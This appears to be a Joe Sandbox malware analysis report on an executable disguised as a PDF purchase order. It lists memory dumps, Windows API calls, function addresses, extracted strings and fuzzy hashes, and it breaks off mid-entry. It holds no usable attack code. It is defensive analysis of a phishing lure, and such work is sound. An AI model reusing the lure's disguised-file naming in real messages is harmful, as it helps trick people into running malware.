Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Function 00405B8F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

Analysis Process: PURCHASE ORDER TRC-0909718-24_pdf.exePID: 7716, Parent PID: 7316COMMON

Executed Functions

Function 00155F90 Relevance: 6.7, Strings: 5, Instructions: 467COMMON

Download Yara Rule

Strings

(o^q, xrefs: 00156505
,bq, xrefs: 00156252
(o^q, xrefs: 001561E8
(o^q, xrefs: 001561DA
,bq, xrefs: 00156260

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2525668591
Opcode ID: ce30effbe8b0ef5624e4216399e367555d348246c107528ceaaba2b3d7118128
Instruction ID: 6f747573016bf37011fde6c46625ef4692f93a0ec4cdc51351a2cf2e517a9e20
Opcode Fuzzy Hash: ce30effbe8b0ef5624e4216399e367555d348246c107528ceaaba2b3d7118128
Instruction Fuzzy Hash: 57124130A00219DFCB15CF69C994AADBBF2FF88315F558069E825DB261DB31DD89CB90

Function 00154328 Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

PH^q, xrefs: 00154590
0oAp, xrefs: 001543AA
PH^q, xrefs: 001545A1
LjAp, xrefs: 0015452E
LjAp, xrefs: 00154518

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: d2a72007e61d5787eb5f4051d5314fe6ddd0e9ec353e85e67cc95b718b29fc1c
Instruction ID: 17c81e96024badea58694d8dd79cf1f72c32cf4a8f8559bd951872454413431b
Opcode Fuzzy Hash: d2a72007e61d5787eb5f4051d5314fe6ddd0e9ec353e85e67cc95b718b29fc1c
Instruction Fuzzy Hash: 5A91D574E00258CFDB18DFA9D884A9DBBF2BF89305F14C069E819AB365DB349985CF50

Function 00158DA0 Relevance: 6.1, Strings: 4, Instructions: 1138COMMON

Download Yara Rule

Strings

4'^q, xrefs: 00159AD3
4'^q, xrefs: 00158DC4
(o^q, xrefs: 001594D8
4'^q, xrefs: 00158ECC

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: (o^q$4'^q$4'^q$4'^q
API String ID: 0-183542557
Opcode ID: 86774823c610c287d28744bcf810474a9a1e7d9059f8a8e57cf8cd1d67525909
Instruction ID: 37d65931086347ab99bc1ec9043f3d07274a438b24692ebb23a60be2ffd3d613
Opcode Fuzzy Hash: 86774823c610c287d28744bcf810474a9a1e7d9059f8a8e57cf8cd1d67525909
Instruction Fuzzy Hash: 5BA26E70A04209DFCB15CF68C994AAEBBB2FF88301F158569E815DF261D734ED89CB61

Function 00155968 Relevance: 3.0, Strings: 2, Instructions: 511COMMON

Download Yara Rule

Strings

Hbq, xrefs: 00155D6E
(o^q, xrefs: 00155EA2

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 2d6434aaa9ef5f6c44785648ec6d6e18ae3df541209a505f1fae397029ea06f1
Instruction ID: 1d0ccd471b7d5acdf93a1bbffd66a46f4fa5c5e2e2daee9f46811b6c0a030c42
Opcode Fuzzy Hash: 2d6434aaa9ef5f6c44785648ec6d6e18ae3df541209a505f1fae397029ea06f1
Instruction Fuzzy Hash: DD128F71A00619CFCB14DFA9C854AAEBBF6FF88301F148569E919DB391DB309D85CB90

Function 001566B8 Relevance: 10.5, Strings: 8, Instructions: 456COMMON

Download Yara Rule

Strings

(o^q, xrefs: 0015687A
(o^q, xrefs: 00156BC7
(o^q, xrefs: 001567B1
,bq, xrefs: 00156B68
(o^q, xrefs: 00156BD7
(o^q, xrefs: 001566F6
(o^q, xrefs: 001567DD
,bq, xrefs: 00156B58

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 448eb57d44ebae67c2d2e48b170f549ef33cdee74d07a5b4fb881cf99a1eae30
Instruction ID: 163e508bffc7727ec8f6a33fc386a9c0c41d87ee7b6c76754d2d69c40ce6acaa
Opcode Fuzzy Hash: 448eb57d44ebae67c2d2e48b170f549ef33cdee74d07a5b4fb881cf99a1eae30
Instruction Fuzzy Hash: FD125930A00208DFCB15CF69D984A9EBBF2FF48315F558569E869DB261DB30ED49CB90

Function 001519B8 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

Xbq, xrefs: 00151AB0
Xbq, xrefs: 00151A76
Xbq, xrefs: 00152CBE
Xbq, xrefs: 00151B2F
Xbq, xrefs: 00152C95
Xbq, xrefs: 00151B7C

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
API String ID: 0-1317942629
Opcode ID: ce8b610d8ad82e6562454783dcd4c5f3ad172fb47f7d3a8df7f1807f2f107971
Instruction ID: b1d00f88a76770201dd0a41c844ac03903550f434afdb97266b2a19ac5dc7041
Opcode Fuzzy Hash: ce8b610d8ad82e6562454783dcd4c5f3ad172fb47f7d3a8df7f1807f2f107971
Instruction Fuzzy Hash: 5742FAA7E1D3E18FC7124B705CB82597FB17B22106BDE459EC8C297287EBA58485C353

Function 00157458 Relevance: 3.2, Strings: 2, Instructions: 704COMMON

Download Yara Rule

Strings

$^q, xrefs: 00157F9F
$^q, xrefs: 00157F7C

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 0ea490a60e2436c3dcfcffd6ef66fe5945a23dfbd07c8e28caa15c4f8fa5709d
Instruction ID: 1cf1ebb06797692ca266ce88899a1764a12c12526612f4d53b4d39a2b469d8af
Opcode Fuzzy Hash: 0ea490a60e2436c3dcfcffd6ef66fe5945a23dfbd07c8e28caa15c4f8fa5709d
Instruction Fuzzy Hash: AC520074A00218CFDB14DBA4C961BAEBB76EF44300F1081A9D51A7B3A5CF359E89EF51

Function 00154F00 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

Hbq, xrefs: 00154FEB
Hbq, xrefs: 0015501E

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: da5c1ad5c42b56370c6df26a9f756d3cdeff641cd0c7f5b955c5b800d8eb868c
Instruction ID: b3c973fd80a5ba5422e73b783588b19b989173e10cdc0df429a3fae376365e7a
Opcode Fuzzy Hash: da5c1ad5c42b56370c6df26a9f756d3cdeff641cd0c7f5b955c5b800d8eb868c
Instruction Fuzzy Hash: 3DB1AE30304650CFCB159F39C8A4B6A7BE6AF88316F158569E816CF3A1DB74CC89CB91

Function 00155460 Relevance: 2.7, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

,bq, xrefs: 00155536
,bq, xrefs: 00155540

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 510339c4830ab6942c842e9cb1f8e6363576fd09d2677d7e3315ceefabab43d9
Instruction ID: 0e35f7f0e8a1a2643f581e8e887dfba2d2af4b5d67f8f2c73ad142419ae24df8
Opcode Fuzzy Hash: 510339c4830ab6942c842e9cb1f8e6363576fd09d2677d7e3315ceefabab43d9
Instruction Fuzzy Hash: EF818F30A00945CFCB18CF69C4A49AAB7B3BF88316B658169E825DF365E731EC45CF51

Function 00158D19 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4'^q, xrefs: 00158D44
4'^q, xrefs: 00158D2D

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 2fdc6a1d4e2ef8e24a4d1de36cfa0d63398d91bfe214fe818781664c92ac6841
Instruction ID: b41f299435f96a6a6ed1e445de2cbe8c15cdaad7cc311a964bfd09f008c67d0a
Opcode Fuzzy Hash: 2fdc6a1d4e2ef8e24a4d1de36cfa0d63398d91bfe214fe818781664c92ac6841
Instruction Fuzzy Hash: 1CF062353402186FDB081AAA9C5497B7ADBEBDC3A1B148429FD1DCB391DF72CC4647A1

Function 00150B30 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00150B62

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: a608871ce892ce18ccd907f1328ec39271c9c0dd38e1547558d3196025d41f0c
Instruction ID: 235fff8977e7ee621c4e7037b6853307e0da2666660a954de0b84e146f46a2ac
Opcode Fuzzy Hash: a608871ce892ce18ccd907f1328ec39271c9c0dd38e1547558d3196025d41f0c
Instruction Fuzzy Hash: F5A1CD74E00249CFCF04DFA8D98499DBBB2FB49305B104629E619BB365EB34AD46CF84

Function 00159EB0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

(o^q, xrefs: 0015A039

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 3bbf67d76e614adad7d90964a8fcd42323995e2c8eaefd583186ac004c6fe583
Instruction ID: d14cbc0d4d5faf799c614d8d285c84511ac97e68f8c5aae84fecf2331a31d2af
Opcode Fuzzy Hash: 3bbf67d76e614adad7d90964a8fcd42323995e2c8eaefd583186ac004c6fe583
Instruction Fuzzy Hash: 2641FE31B042048FCB149F78D854AAE7BF2AFC8711F24416AE91ADB7A1CF309C85CB91

Function 00156C98 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 516624c0ccb9581020d46f97001db4791b1617e9a34d2a4ab0a66d3587274298
Instruction ID: 41fcb74457d1db5e8d39927413eec3b6c1765358d9119871d4a7514d5f283219
Opcode Fuzzy Hash: 516624c0ccb9581020d46f97001db4791b1617e9a34d2a4ab0a66d3587274298
Instruction Fuzzy Hash: 6B711434700205CFCB14DF68C895A6A7BF6EF49702B5944A9E826CB3B1DB74EC85CB90

Function 0015AF90 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24c381382291cd0a828dad1cc94f6749355bc63f5f234a24738f91fef092e72f
Instruction ID: 4b461b9f1664907eb483cafb6d1ab6b3093b9281570fb287e0ba801db2705d84
Opcode Fuzzy Hash: 24c381382291cd0a828dad1cc94f6749355bc63f5f234a24738f91fef092e72f
Instruction Fuzzy Hash: BA717F31608655CFC715CF28C8D896A7BB1FF46312B168499FC699F2A2C731EC89CB91

Function 00153168 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4652bc5c0fa1d0f66c4d7ec880251f4cc1cce7b4d219c93817e3f4242753a533
Instruction ID: 3f673dc1bb8b777d99423c99f4464a12b9cccc939b48fd34129029d93e42b7b6
Opcode Fuzzy Hash: 4652bc5c0fa1d0f66c4d7ec880251f4cc1cce7b4d219c93817e3f4242753a533
Instruction Fuzzy Hash: A051B074E01208DFCB08DFA9D58499DBBF6FF89305B208069E919BB324DB35A946CF54

Function 00158BF0 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782af27440fb29b7e2c24fea09dba1a9a6b85920a872d87b20c45e212970eafa
Instruction ID: 4d2bdd27fafaa9b22b1cd471d42def9b187e6419c720780dc40e337414646cde
Opcode Fuzzy Hash: 782af27440fb29b7e2c24fea09dba1a9a6b85920a872d87b20c45e212970eafa
Instruction Fuzzy Hash: 17419E30601245CFDB01DF28C884BAA7BA6EF89305F148066ED28DF266DB74DD49CBA5

Function 00154620 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03df35c3d8914117c11cdb2fca4a5dd2b9d50c509e734d709f7fe35612de08a4
Instruction ID: b55443ef38f5cf4b8b1cb7406c41d77894edf920afe36e4a9627f44846c75492
Opcode Fuzzy Hash: 03df35c3d8914117c11cdb2fca4a5dd2b9d50c509e734d709f7fe35612de08a4
Instruction Fuzzy Hash: 5231E131604149EFCF05AF64D895AAE3BB2EF89305F108025FD299B255CB35CEA5DBA0

Function 0015FE10 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fdd8641132182f398600745289495d33649648ffb89e9a061ca8a7c18ef2be9
Instruction ID: e1188d87a33b5507389b6cc529e93a6e8bca806fc57565505d0b40e6648559d4
Opcode Fuzzy Hash: 3fdd8641132182f398600745289495d33649648ffb89e9a061ca8a7c18ef2be9
Instruction Fuzzy Hash: 65317EB490424ADFCB01CFA8C144AADBFF1EF0A311F1045AAD865AB371D7319A45DB81

Function 00156F40 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d41bfbc64803bfcba40aeabb8bfcf227cc26c125b055aa736ef834d2de8f574a
Instruction ID: eb00bf4a485947c7fe7c5cea8ae7565e01a4d1c8233fb507d9875273d4a9ebc2
Opcode Fuzzy Hash: d41bfbc64803bfcba40aeabb8bfcf227cc26c125b055aa736ef834d2de8f574a
Instruction Fuzzy Hash: 7B21D6313082008BDB151725E855A3E25D79FC575AF648439E816CF7D8EF36CC8A93C1

Function 001518C8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fbe67d209e39fcc5643c123bbbbff6af5220b492dada87b725884a989a56f1c
Instruction ID: 45e71aa587b634e987ba311cd8c5cbeb5fefbab6df8e6d23a2f2d87d73cc15ba
Opcode Fuzzy Hash: 1fbe67d209e39fcc5643c123bbbbff6af5220b492dada87b725884a989a56f1c
Instruction Fuzzy Hash: EF219075A00106AFCB25DF24C450AAE77A5EF99768B11C019DD5E9B240EB34EE0ACBD2

Function 001552C8 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cfea68901d4a05767638d58d205ec69a4e0fc49d82db77fd048f3ace246c4ed
Instruction ID: 90f5cacb957855be2d4e744f86953683266b4b52fc971baec45e5f774c6c0095
Opcode Fuzzy Hash: 1cfea68901d4a05767638d58d205ec69a4e0fc49d82db77fd048f3ace246c4ed
Instruction Fuzzy Hash: 2021FF31300911CFC7199B26D86852EB3A3FF857927154028E81ADF750CF70DC46CB90

Function 000AD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917973623.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ad000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 867bdc104b9fdf13748c1dba1d958e5fe823317b2dade7d2fd060270355a4f7d
Instruction ID: e89f49bf16575e18074979d6e38091d05812a4e43552af7c0281eda408d09cc0
Opcode Fuzzy Hash: 867bdc104b9fdf13748c1dba1d958e5fe823317b2dade7d2fd060270355a4f7d
Instruction Fuzzy Hash: 68213471604200EFCB20DF94D9C0F2ABBA1EB85314F24C56ED94A4B656C33AD847CA62

Function 00150EC8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1794f730a84937db674430517ed25080f79f722b30284501b2ea0cca2e540cf6
Instruction ID: 3a132f5ac43e3f73787785ece8065d49aabe4d7f453aa721f45141e55c080a05
Opcode Fuzzy Hash: 1794f730a84937db674430517ed25080f79f722b30284501b2ea0cca2e540cf6
Instruction Fuzzy Hash: B9219074E042489FCB06EFB9C4006AEBBB2EF8A305F0084AA9854AB255DB745A49CF51

Function 001517B8 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 559c111d0912656b471d77b69c80574796edcc3ac0939266cabac560b9580e09
Instruction ID: a99bd4e7450d89e1f2b1951710d7f8f3830636c22e8b2e2ea732ec1d1ae55dd2
Opcode Fuzzy Hash: 559c111d0912656b471d77b69c80574796edcc3ac0939266cabac560b9580e09
Instruction Fuzzy Hash: BA211674D052498FCB02DFB9D8446EEBFF4EF0A300F0441AAD545BB261EB305A89CBA1

Function 00158729 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d388f502f3f08e04c1e2afb8e3990b7d8334662bd30898f4272bd5109d6baf30
Instruction ID: bb133e04cef3738f09aa6ef00f0607a6a6113104a3e424aae44899d2c95030e4
Opcode Fuzzy Hash: d388f502f3f08e04c1e2afb8e3990b7d8334662bd30898f4272bd5109d6baf30
Instruction Fuzzy Hash: AD215C70E01249DFCB05DFA5D550AEDBFB6AF48306F248069E825F6290DB30D985DB60

Function 0015B2C8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d43cb1b0efd39b1ca4d3fed7e64898992b4e659f85adc90508d0383aa5ac535b
Instruction ID: 2110addc4b25a465953103fd108dc49f58297bd836f57ca9d1957223ecd38e52
Opcode Fuzzy Hash: d43cb1b0efd39b1ca4d3fed7e64898992b4e659f85adc90508d0383aa5ac535b
Instruction Fuzzy Hash: FD010836B082014FDB559F35489862F7BE6BF8971930444BDD90ACB215FF60C8498752

Function 000AD02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2917973623.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ad000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeeb28edeb7a7844692f5c9e5b1c86b761d25cb2a560f87f4e21d5c9dbefd6d7
Instruction ID: bad8b34923b5fca9ae4a1ea839c91f39fe9a3551cd3301db509fc3a9b6a90358
Opcode Fuzzy Hash: aeeb28edeb7a7844692f5c9e5b1c86b761d25cb2a560f87f4e21d5c9dbefd6d7
Instruction Fuzzy Hash: 6111DD75504280DFCB11CF54D5C4B15FFB2FB85314F28C6AAD84A4BA56C33AD84ACB62

Function 00154E5F Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
